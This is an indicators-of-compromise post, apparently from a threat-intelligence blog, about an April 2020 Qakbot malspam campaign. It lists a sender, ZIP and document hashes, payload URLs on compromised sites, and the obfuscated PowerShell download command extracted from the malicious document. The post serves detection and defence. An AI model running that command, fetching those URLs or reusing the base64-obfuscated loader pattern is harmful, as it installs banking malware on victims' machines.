ExecuteMalware

2020-04-07 Qakbot IOCs

Apr 7th, 2020
QAKBOT IOCs

SENDERS OBSERVED
Abrar Kazmi <[email protected]>

MALDOC DISTRIBUTION URLS

ZIP FILE HASH
381c6f4adac6e4070e77004be6033ba4

DOCUMENT FILE HASH
e2200f54024d7f25d9ef67d172d59387

POWERSHELL FROM MALDOC
cmd /c powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL3JldHJvYmFuZC51ay93cC1jb250ZW50L3VwbG9hZHMvMjAyMC8wNC9zbGlkZXIvNDQ0NDQ0LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt 2>&1

QAKBOT PAYLOAD
http://retroband.uk/wp-content/uploads/2020/04/slider/444444.png
http://wppunk.com/wp-content/uploads/2020/04/slider/444444.png
http://kramo.pl/wp-content/plugins/apikey/slider/444444.png
http://b.assignmentproff.com/amyceyaihd.png